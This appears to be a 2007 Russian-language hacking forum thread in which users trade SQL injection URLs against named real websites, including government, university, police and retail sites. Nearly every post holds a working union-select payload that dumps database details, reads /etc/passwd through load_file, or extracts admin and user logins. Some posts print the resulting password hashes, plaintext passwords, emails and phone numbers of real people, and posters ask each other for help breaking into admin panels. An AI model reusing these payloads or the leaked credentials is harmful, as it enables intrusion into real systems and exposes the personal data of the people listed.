http://www.rossoshweb.ru/modules/news/news.php?id_news=-1+union+select+1,concat(username,0x2F,user_passwor d),3,4,5,6,7,8,9,10+from+u66116.as_users+limit+1,1/*
логин/хеш в <title>
admin/21232f297a57a5a743894a0e4a801fc3
--------------------------------------------------------------------
http://www.chelnews.ru/auto/?newsid=-1+union+select+concat(version(),0x2F,database(),0x 2F,user())/*
4.0.27-standard-log/chelnews_main/chelnews_admin@localhost
big_BRAT
23.10.2007, 21:55
site: http://www.savage.ua/
site: http://www.savage.ru/
http://savage.ua/news.php?target=news&id=994'+unIon+SeleCt+1,concat(table_schema,'.',tab le_name),3,4+from+information_schema.tables+limit+ 17,1/*
savageua.buy
savageua.news
savageua.tech
http://savage.ua/news.php?target=news&id=994'+unIon+SeleCt+1,column_name,3,4+from+inform ation_schema.columns+where+table_name='buy'+limit+ 8,1/*
лёгкий прикол
http://savage.ua/news.php?target=news&id=994'+unIon+SeleCt+null,CONVERT(0x3c666f6e742063 6f6c6f723d677265656e3e3c68313ed0a2d0b5d0bbd0bed0b3 d180d0b5d0b9d0bad0b020416e7469636861743c2f68313e%2 0USING%20utf8),0x3c623e506f7765722062793c2f623e3c2 f666f6e743e3c696d67207372633d687474703a2f2f666f727 56d2e616e7469636861742e72752f616e7469636861742f706 9632f7261632e6769663e,null/*
megalab.it
http://www.megalab.it/news.php?id=-1+union+select+1,2,concat(version(),0x3a,database( ),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66/* В title: 5.0.37-log:megalab:megalabdb@localhost
88 таблиц: http://www.megalab.it/news.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65,66+from+information_schema.tables+limit+ 88,1/* Данные из таблицы phpbb_users в формате "логин:пасс:мыло:icq":http://www.megalab.it/news.php?id=-1+union+select+1,2,concat(username,0x3a,user_passw ord,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65,66+from+phpbb_users+limit+0,1/*
Официальный сайт УВД города-курорта Сочи:
_http://suvd.ru/rozisk.php?id=-1'
Вывода данных не нашёл, хотя количество полей определяется. На сайте несколько скулей.
Вот ещё:
_http://www.head.com/corporate/news.php?id=-1'
Центр международных исследований в Минскеhttp://www.cfis.by/news.php?id=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4,5/*&lng=ru4.0.24_Debian-10sarge1-log:cfisby:cfisby@localhost
www.templatesfree.ruhttp://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user())/*5.0.27-standard:eldar07_tmpfree:eldar07@localhost
30 таблиц:http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,table_name+from+information_schem a.tables+limit+30,1/*но только таблицы с юзверями я не нашёл... :(
http://fotoway.info/docs.php?id=-1'+union+select+1,2,concat(user(),0x3a,version(),0 x3a,database()),4,5,6,7,8,9,10/*forumphpbb@localhost:4.1.19:forumphpbbhttp://fotoway.info/docs.php?id=-1'+union+select+1,2,concat(username,0x3a,user_pass word,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9,10 +from+phpbb_users+limit+0,1/*http://www.zlatoust.info/firms.phtml?inf=show&id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,vers ion(),0x3a,database()),8,9,10,11,12,13/*zlatoustinfo@81.177.16.31:4.1.21:zlatoustinfohttp ://www.zlatoust.info/firms.phtml?inf=show&id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a,us er_password,0x3a,user_email,0x3a,user_icq),8,9,10, 11,12,13+from+phpbb_users+limit+0,1/*
www.doctor-al.ruhttp://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat(version(),0x3a,databas e(),0x3a,user()),5,6,7/*&type=article5.0.24a:doctor_al_ru:doctor_al_ru@loca lhost
60 таблиц:http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,table_name,5,6,7+from+informa tion_schema.tables+limit+60,1/*&type=articleТаблица shop_users:http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat(login,0x3a,name,0x3a,p assword,0x3a,phone,0x3a,email),5,6,7+from+shop_use rs+limit+0,1/*&type=articleданные в формате: "логин:имя:пасс:телефон:мыло".
Есть таблица users, но данные из неё достать не получается. Подскажите, буду благодарен...
В таблице users есть поля login, password, tel, tel_2, full_name, email, email_2, icq
http://www.captains-club.ru/index.php?id=9999999+union+select+1,2,3,4,user(),6 ,7,8,9,10/*
Не стал дальше шарить.Чистно случайно наткнулси на сайД.
Есть таблица users, но данные из неё достать не получается. Подскажите, буду благодарен...http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,table_schema,5,6,7+from+infor mation_schema.tables+where+table_name=char(117,115 ,101,114,115)+limit+0,1/*allergic_ru.usershttp://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,column_name,5,6,7+from+inform ation_schema.columns+where+table_name=char(117,115 ,101,114,115)+and+table_schema=char(97,108,108,101 ,114,103,105,99,95,114,117)+limit+0,1/*id, дальше работай лимитом
аналогично для mega_magazin_ru.usershttp://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,column_name,5,6,7+from+inform ation_schema.columns+where+table_name=char(117,115 ,101,114,115)+and+table_schema=char(109,101,103,97 ,95,109,97,103,97,122,105,110,95,114,117)+limit+0, 1/*Итого:http://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat(login,0x3a,password,0x 3a,email,0x3a,icq),5,6,7+from+allergic_ru.users+li mit+0,1/*иhttp://www.doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat(login,0x3a,password,0x 3a,email,0x3a,icq),5,6,7+from+mega_magazin_ru.user s+limit+0,1/*
http://www.vaal.ru/show.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
www.uralmir.ruhttp://www.uralmir.ru/articles.php?id=-1+union+select+1,2,concat(version(),0x3a,database( ),0x3a,user()),4,5,6,7,8,9/*4.1.21-log:uralmirr_main:uralmirr_main@localhost
Iceangel_
24.10.2007, 15:08
uitpers.be
http://www.uitpers.be/artikel_view.php?id=348+union+select+1,2,3,4,conca t(user(),0x3a,database(),0x3a,version()),6,7/*
roxo.kiev.ua
http://roxo.kiev.ua/showarticle.php?id=348+union+select+1,concat(user( ),0x3a,database(),0x3a,version()),3,4,5,6/*
Пркольная защита =) ...
http://www.untp.kiev.ua/index.php?id=348'
Iceangel_
24.10.2007, 17:04
Магазин цифровой техники vcam.ru
http://vcam.ru/goods.php?id=-472+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12/*
таблицы не нашел... =(
h__p://mp3.p6.ru/index.php?act=album&id=1121039%20union%20select%201,version(),3,4,5,6, 7,8/*
нашёл случайно, как обычно.
доступа к mysql нет.
Booblick
24.10.2007, 19:31
http://ont.by/index.php?id_issue=-5+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7,8,9,10,11/*
Даальше застрял ребят помогите!
как выудить пароль на админку к сайту?
Или, что нибудь замутить с ним
http://www.pille-palle.net/forum2/forum_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a, version(),0x3a,database()),10,11,12,13/*ftp34268@vanadium.webpack.hosteurope.de:5.0.32-Debian_7etch1~bpo.1-log:pille_palle_net
http://www.pille-palle.net/forum2/forum_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user,0x3a,pa sswort),10,11,12,13+from+PPuser/*fundrugs =)http://www.russian-online.net/boltalka/current_message.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12/*web59@localhost:5.0.41:usr_web59_4http://www.russian-online.net/boltalka/current_message.php?id=-1+union+select+1,2,concat(username,0x3a,passwd,0x3 a,email),4,5,6,7,8,9,10,11,12+from+usr_web59_1.tbB enutzer/*polinux:123456:polinux@web.de polina:12345:polina.kravets@mail.rusorel:12345:pol ina.sorel@gls-itservices.com
Серенький
24.10.2007, 20:35
//www.interomania.ru - сайт болелов Интера
есть дырка в news.php, но скрипт от юзера z34244_news@85.249.135.6, доступа никуда кроме z34244_news нет, аналогично со скриптом main.table.php - дырка
http://www.interomania.ru/controlsystem/main.table.php?view=teamresults&team=-CSKA')+union+select+1,2,3,4,5,6,concat_ws(0x3a,use r(),version(),database()),8,9/*lдоступ к базе z34244_stat
потом нашлась гостевуха и таблицы с пользователями
http://gb.interomania.ru/gb.php?action=viewuser&name=311'+union+select+concat_ws(0x3a,name,pass)+f rom+users/*вывод посимвольный
guest3297
24.10.2007, 21:45
Shadow']а антибоян посмотреть забыл? =\
Посмотри предыдущий пост до моего.
_http://partytown.ru/people.php?id=-3+union+select+1,2,concat_ws(0x3a,username,icq,pas sword),4+from+chatusers+limit+1,1
Tonikk:120853239:2e4b6dc525afb5cb
код:
http://www.emubands.com/bands.php?band_id=-202+union+select+1,concat(username,0x3a,password)+ from+user/*
код:
http://www.emubands.com/bands.php?band_id=-202+union+select+1,concat(username,0x3a,password)+ from+band/*
колонки с мылом подобрать не смог,а может ее и нет вовсе?
p.s особо не искал
turistua.com
Интернет-магазин товаров для туризма.
http://shop.turistua.com/index.php?x_id=1+union+select+name+from+admin/*_________________________________________________ ___
***********************************************
-MoLoToK-
25.10.2007, 05:30
http://www.m-logos.ru/seminars/info.phtml?id=-1+union+select+1,2,3,4,version(),user(),7,8,9,data base(),11,12,13,14,15,16,17,18,19,20/*
4.0.27-log///mlogos@pm15.zenon.net///mlogos
www.timo4.comhttp://www.timo4.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(v ersion(),0x3a,database(),0x3a,user()),14,15,16,17, 18,19,20,21,22,23,24,25,26/*&today=2005.07.27&lang=rus4.1.22:timo4:u_timo4@localhost
Админ:http://www.timo4.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(u ser,0x3a,pass),14,15,16,17,18,19,20,21,22,23,24,25 ,26+from+users+limit+0,1/*&today=2005.07.27&lang=rusArdel:50bcc2c899839223f5fb242b8c215d20
www.job.uralmedia.ru - работа на Уралеhttp://www.job.uralmedia.ru/index.php3?action=view_vacancy&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t(version(),0x3a,database(),0x3a,user()),15,16,17, 18,19,20,21,22,23,24,25/*4.0.24_Debian-1:job:Chie1heingaephee@localhost
Таблицы подобрать не смог.
chelindustry.ru - Предприятия Южного Уралаhttp://chelindustry.ru/podrob_per.php?id_p=255&rr=-1+union+select+1,2,concat(version(),0x3a,database( ),0x3a,user()),4,5,6,7/*4.0.26:helg:helg@localhost
Таблицы не поддаются :mad:
http://www.volganin.net - универсальная доска объявлений Челябинскаhttp://www.volganin.net/ind.php?id_typ=-1+union+select+1,2,3,4,5,concat(aes_decrypt(aes_en crypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_e ncrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes _encrypt(user(),0x71),0x71)),7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24/*®word=id_gorod=59&tr=14.1.14-log:volgani8_base1:volgani8_Alex22@localhost
http://www.corporinoquia.gov.co/masinfo.php?id=-1+union+select+1,2,3,4,concat(user(),0x3a,version( ),0x3a,database()),6,7,8,9,10,11,12,13/*corporin_impacto@localhost:4.1.22-standard:corporin_acghttp://www.fondomixtoculturaquindio.gov.co/vercontenido.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,ve rsion(),0x3a,database())/*rhisshos_fmixto@localhost:4.1.22-standard-log:rhisshos_fondomixtohttp://www.redehospitalbaq.gov.co/ver_noticia.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6,7,8,9/*redehco2@localhost:4.1.21:redehospitalbaq_gov_co_-_redehospital
www.oilworld.ruhttp://www.oilworld.ru/tender.php?domain=-1+union+select+concat(version(),0x3a,database(),0x 3a,user())/*5.0.27-log: oilworld: oilworld@localhost
62 таблицы:http://www.oilworld.ru/tender.php?domain=-1+union+select+table_name+from+information_schema. tables+limit+61,1/*Юзеры (имя,логин,пасс,мыло):http://www.oilworld.ru/tender.php?domain=-1+union+select+concat(name,0x3a,login,0x3a,psw,0x3 a,email)+from+users+limit+380,1/*chelsi.ru - Челябинская служба информацииhttp://job.chelsi.ru/view_vac.php?id=-1+union+select+1,2,3,4,concat(version(),0x3a,datab ase(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20/*4.1.20-lk-log:chelsiru_job:chelsiru_job@localhost
K1nD[e]R
25.10.2007, 13:43
http://www.jetphotos.net/viewphoto.php?id=-6089343+UNION+SELECT+1,2,3,4,5,6,7,USER(),version( ),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28/*
USER: hotrodpi_root@rpweb1p
Дальше не мог откапать..
Red_Red1
25.10.2007, 13:49
http://www.jetphotos.net/viewphoto.php?id=-6089343+UNION+SELECT+1,2,3,4,5,6,7,table_name,tabl e_schema,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28+from+information_schema.tables+lim it+1,1/*
Вот дальше. Странно, почему не смог дальше? Пятая версия мускула, не нужно ничего подбирать!
http://www.1234567.ru/topic.html?topic=35/**/UNION/**/SELECT/**/1,null,concat(cl_email,char(58),cl_pass)/**/From/**/clients/**/where/**/cl_email/**/like/**/CHAR(37,64,37)/**/limit/**/223403,1/*
http://www.jetphotos.net/viewphoto.php?id=-6089343+UNION+SELECT+1,2,3,4,5,6,7,table_name,tabl e_schema,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28+from+information_schema.tables+lim it+1,1/*
Вот дальше. Странно, почему не смог дальше? Пятая версия мускула, не нужно ничего подбирать!
а там только две базы - убери table_schema или поставь where table_schema = , и думаю всё получится!
K1nD[e]R
25.10.2007, 14:21
http://intercar.com.ua/index.php?id=-19+UNION+SELECT+1,2,version(),USER(),5,6/*
Red_Red1
25.10.2007, 14:37
2 sunb0rn.
У меня как раз все получилось. Своим постом я отвечал K1nD[e]R. :)
2 K1nD[e]R. Та все можно "откапать" даже пароли не зашифрованы. Хотя может и не все, там в разных таблицах пароли :)
K1nD[e]R
25.10.2007, 14:50
ага да я тока 1 раз попробывал...
http://www.planeta2.ru/print_news.php?id=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,d atabase(),0x3a,user())/*4.1.21-standard : planeta2_db : planeta2_base@localhosthttp://www.hayinfo.ru/print.php?tb_id=2&sub_id=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat(version(),0x3a,database(),0 x3a,user())/*4.1.22:wwwhayinforu_hayinfo:hayinfo@localhost
Mystery: legends of the beyond
это браузерная ролевая многопользовательская онлайн-игра,
основанная на принципах ККИ (коллекционных карточных игр).
.................................................. .......................
http://mystery.bigmir.net/game/frames/userdetails.php?id=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65,66,67,68,69,70,71,72,73,74,75+from+INFOR MATION_SCHEMA.TABLES+limit+55,1/*................................................. ........................
Админ панель форума:
http://mystery.bigmir.net/forum/index.php
-------------------------------------------------------------------------------
http://mystery.bigmir.net/game/frames/userdetails.php?id=-1+union+select+1,version(),concat(username,0x203a2 0,user_password),4,5,6,7,8,user(),10,11,12,13,14,1 5,16,17,18,19,database(),21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,user_email,64,65,66,67,68,69,70,71,72,73,74,75+fr om+forum.phpbb_users+limit+1,1/*
admin:602a22d25967b8ed0c401e445e020587:forum1111
.................................................. .......................
USERS:
Mystery: legends of the beyond, users.
-------------------------------------------------------------------------------
http://mystery.bigmir.net/game/frames/userdetails.php?id=-1+union+select+1,version(),concat(name,0x203a20,pa ssword),4,5,6,7,8,user(),10,11,12,13,14,15,16,17,1 8,19,database(),21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75+from+mystery2.USERS +limit+0,1/*
admin:95KFVKtN
-------------------------------------------------------------------------------
БД:
information_schema
forum
mystery
mystery2
test
-------------------------------------------------------------------------------
Таблицы:
WORLDMAP
USER_TEMPSCRIPTS
USER_RIGHTS
USER_PROF
USER_PENALTY
USER_MAPCELL_PROPS
USER_MAPCELL_BAG
USER_MAP
USER_LOG
USER_LOCATIONS_VISIBILITY
USER_DECK_PRESETS
USER_DECK
USER_AWARDS
USER_ARTEFACTS
USERS
phpbb_users
--------------------------------------------------------------------------------
************************************************** ************
[53x]Shadow
25.10.2007, 17:24
www.aim.edu
http://www.aim.edu/faculty/facultyresume.asp?id=-1+or+1=@@version--
Version:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
Интересные таблы:
Microfinance.admin_login
Microfinance.Registration
aimadb.users
Users:
admin:aimadb
dbriones:adbaim
mperalta:mperalta
policy:aimpolicy
0nep@t0p
25.10.2007, 17:30
Интернет магазин "Магистра"
http://shop.magistra.ru/catalog/phone_ext.php?id_t=-284+union+select+1,2,0x3C7363726970743E616C6572742 82773716C27293C2F7363726970743E,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61, 62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78 ,79/*
Версия: 4.1.22-log
Юзверь: magistr6_shop@localhost
Опять доисторический баг в phpBB форуме
depressia.com
http://depressia.com/forum/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20user_icq,2,user_email,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,username,21 ,22,23,24,25,26,27,28,29,user_password%20FROM%20ph pbb_users%20LIMIT%201,999/*
Версия: 4.1.22-standard-log
Юзверь: depressi_depress@localhost
Тестовый акк на форуме:
Login: sqlbug
Pass: 123
phpBB admin
login: Admin
hash: 6c4ed79eb38fc8aa064eaa5208ce0adf
big_BRAT
25.10.2007, 19:35
http://ck_DEL_pt.ru/service?id=169+uniOn+selEct+1,2,3,4,5,6,7,version( ),9,0,1--
помогите найти таблицу админки
непохек
http://www.ukrmebe l.com/ClInfo.php?Id=-262+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(version(),0x78),0x78),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16/*
Не умею юзать aes_decrypt/encrypt,где о нём почитать?
хек
БД
4.0.27-max-log*bormebel:bormebel@v8.valuehost.ru
http://www.bormebel.com/catalog/index.php?id=-37+UNION+SELECT+concat(version(),0x2a,database(),0 x3a,user()),2+from+users/*
Админ
admin:ftn-admn:julia_r@fortun.ru
http://www.bor mebel.com/c atalog/index.php?id=-37+UNION+S ELECT+concat(login,0x3a,pwd,0x3a,email),2+from+use rs/*
http://www.borme bel.com/admin
P.S.подкиньте пару-тройку приват соксов в личку,кому не жалко)С меня плюсик
telenettv.ru (телекоммуникационная компания )
http://www.telenettv.ru/?razdel=new&id=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3,4/*
5.0.22-log/telenet/siteman@localhost
http://www.telenettv.ru/?razdel=new&id=-1+union+select+1,concat(username,0x2F,password),ic q,4+from+telenet_forum.users+limit+5,1/*
логин/хеш/уин
K1nD[e]R
25.10.2007, 23:02
http://volkswagen-ukraine.com.ua/index.php?id=-20+union+select+1,2,user(),version(),5,6/*
K1nD[e]R
25.10.2007, 23:04
http://terrorism.com/modules.php?op=modload&name=About&file=index&subcontent=services&detail=showtraining&course_requested=999999+union+select+0,load_file(0 x2F6574632F706173737764),2,3,4,5,6,7,8,9,10/*
K1nD[e]R
25.10.2007, 23:46
http://www.ia-centr.ru/theme_details.php?id=-495+union+select+1,user(),version(),load_file(0x2F 6574632F706173737764),5,6,7/*
24rus.ru
http://www.24rus.ru/more.php?UID=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3,4,1,1,1,1,1,1,1,1,1,1,1,1/*
5.0.37/24rus/nia@localhost
http://www.24rus.ru/more.php?UID=-1+union+select+1,concat(MISLogin,0x2F,MISPassword) ,3,4,1,1,1,1,1,1,1,1,1,1,1,1+from+tMIS+limit+0,1/*
логин/пароль
admin/ira78ira
admin/061994
K1nD[e]R
26.10.2007, 00:44
http://www.vaal.ru/show.php?id=-170+union+select+1,concat(version(),0x3a,database( ),0x3a,user()),3,4,5,6,7,8,9,10,11/*
news.nofollow.ruhttp://news.nofollow.ru/?page=list&feedsrc=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7/*&news_type=24.0.26:nofoll:nofoll@aqua3.di-net.ru
www.wfsj.orghttp://www.wfsj.org/projects/page.php?id=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt( version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt (database(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(user(),0x71),0x71)),4,5,6,7,8,9,10,11/*4.1.7-nt-max:wfsj:wfsj@localhost
www.ntu.orghttp://www.ntu.org/main/page.php?PageID=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7/*4.0.20-standard-log:ntu:ntu@reasonb.srv.lexi.net
www.kuleuven.behttp://www.kuleuven.be/cee/page.php?LAN=E&FILE=subject&ID=371&PAGE=-1+union+select+1,2,3,4,5,6,7,8,9,concat(aes_decryp t(aes_encrypt(version(),0x71),0x71),0x3a,aes_decry pt(aes_encrypt(database(),0x71),0x71),0x3a,aes_dec rypt(aes_encrypt(user(),0x71),0x71)),11,12/*4.1.13-standard-log : oce : oce@tobias.cc.kuleuven.ac.be
www.maap.ro - походу Министерство агрокультур Румынииhttp://www.maap.ro/pages/page.php?catid=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8/*&lang=24.1.22-standard:mapam_mapam1:mapam_mapam@localhost
chronicle.comhttp://chronicle.com/stats/productivity/page.php?bycat=true&primary=2&secondary=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,concat(aes_decrypt(aes_encrypt( version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt (database(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(user(),0x71),0x71)),23,24/*4.1.10a-log:CHEfpd:apacher@static1.che.zope.net
www.bookjobs.comhttp://www.bookjobs.com/page.php?prmID=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*В <title>:
4.1.20:aap:root@localhost
0nep@t0p
26.10.2007, 13:02
http://www.spad.ru/
http://www.spad.ru/news.php?news_id=-58+union+select+1,2,3,4,5,6,USER(),VERSION(),9,10, 11/*
User: spad@localhost
Version: 4.0.24-standard
Донбанк
http://www.don-bank.ru/news/?id=-111+union+select+1,2,USER(),4/*
User: metropo3_donbank@localhost
Version:4.1.22-log
Так ни одной таблицы подобрать и не смог :(
http://moi.gov.cy/newscontent.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7,8,9,10,11/*moi@localhost:4.1.22-standard:moi
http://moi.gov.cy/newscontent.php?id=-1+union+select+1,2,3,username,5,password,7,8,9,10, 11+from+users/*adminmoi:entermoi http://moi.gov.cy/administration/index.php
Сегодня захожу, а там уже другая cms =( Но и в ней есть скуль =)
http://moi.gov.cy/index.php?ac=39&l=-1'+union+select+concat(user(),0x3a,version(),0x3a, database()),2,3,4,5,6,7/*moinew@localhost:4.1.22-standard:moinewhttp://moi.gov.cy/index.php?ac=39&l=-1'+union+select+concat(username,0x3a,password),2,3 ,4,5,6,7+from+users/*adelin:f5bb7d76f46bc2d130aa8cc3e6fa5c38
neos:fbade9e36a3f36d3d676c1b808451dd7:z
costas:dc3a463af4afe7d32bedfac972a1b1a6
www.civitas.ru - Всероссийский Гражданский Конгрессhttp://www.civitas.ru/newsprint.php?code=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt( version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt (database(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(user(),0x71),0x71)),4,5,6,7,8,9,10/*5.0.18:congress:alik@localhost
663 таблицы:http://www.civitas.ru/newsprint.php?code=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt( table_name,0x71),0x71)),4,5,6,7,8,9,10+from+inform ation_schema.tables+limit+662,1/*Копался в таблицах - нашёл табу person.
Данные из person в формате "имя:пасс:мыло:телефон:web":http://www.civitas.ru/newsprint.php?code=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt( name,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(pass ,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(email,0x 71),0x71),0x3a,aes_decrypt(aes_encrypt(phone,0x71) ,0x71),0x3a,aes_decrypt(aes_encrypt(web,0x71),0x71 )),4,5,6,7,8,9,10+from+person+limit+0,1/*интересные ящики попадаются "Novitskiy@duma.mos.ru" :D
www.gost.net.ru - БД ГОСТыhttp://www.gost.net.ru/download.php?fFolder=57&fFrom=katalog&fItem=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13/*4.1.20:db000030:u000030@localhost
www.sportclubmai.ru - СПОРТКЛУБ МАИhttp://www.sportclubmai.ru/admin/admin_news/long_news.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7/*4.0.27-standard:db_sportclubmai:sportclubmai@localhost
http://www.legis.krsn.ru/newsinfo.php?UID=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3,4,5,6,7,8,9,10,11,12,13,1,1,1/*
4.0.27-Max/zs24/zs24@localhost
http://www.pro-robotu.kiev.ua/articles.php?aID=-41+union+select+concat(version(),0x2F,database(),0 x2F,user()),2/*&action=view_article
4.0.27-standard-log/rabota2/robota@localhost
Booblick
26.10.2007, 19:37
Люди добрые нужна помощь, как выйцти на данные к базе,
вот, что смог накавырять....
http://ont.by/index.php?id_issue=-5+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11/*
Iceangel_
27.10.2007, 11:54
http://www.websight.ru/conf/addanswer.php?id=-275+UNION+SELECT+1,2,3,4,concat(version(),0x3a,dat abase(),0x3a,user()),6,7,8,9,10,11,12,13/*
4.0.27-max-log:websight:websight@v54.valuehost.ru
P.S
Народ не подскажите где можно скачать словарь с самыми распространенными именами таблиц и полей? с меня ++
код:
http://farms.byu.edu/display-print.php?table=foreign_lang&id=-64+union+select+1,2,3,4,5,6,load_file(0x2f6574632f 706173737764),8,9+from+mysql.user/*
press-c.crimea.ua
http://press-c.crimea.ua/hotnews/?mode=news&cmd=newsRead&sid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,11,12,13,1,1,1,1/*
5.0.45/portcan/evgeni@localhost
http://press-c.crimea.ua/hotnews/?mode=news&cmd=newsRead&sid=-1+union+select+1,2,3,concat_ws(0x2F,account_lid,ac count_pwd),5,6,7,8,9,10,11,12,13,1,1,1,1+from+egro upware.egw_accounts+limit+4,1/*
логин/хеш
eadmin/5bd452074f51edcc480f575dda1faf21
--------------------------------------------------------------------
http://expert.com.ua/index.php?option=news&id=-4'+union+select+1,concat_ws(0x2F,version(),databas e(),user()),3,4,5,6/*&dir=2
4.1.22/expert/u_expert@localhost
http://spa.american.edu/pages.php?ID=-3/**/union/**/select/**/1,2,3,cast(concat_ws(0x3a,version(),user(),databas e())+as+binary),5+--+
4.1.13a-nt:spauser@localhost:spa[B]
http://www.freefromcorporateamerica.com/archives.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(version() ,0x71),0x71),3,4,5,6/*4.1.14-Debian_5-loghttp://www.realestatelistingsfree.com/detail.php?id=22222+union+select+1,2,3,4,5,6,7,8,9 ,10,concat(user(),0x3a,version(),0x3a,database()), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39/*jbrink_realty2@localhost:4.1.22-standard:jbrink_realestatehttp://www.freechineselessons.com/lesson.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6,7,8/*guitar8_paul2@localhost:4.1.22-standard:guitar8_freechineselessonshttp://www.turkprogram.com/indir.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6/*tpusr@localhost:5.0.27-community-nt:tp_db 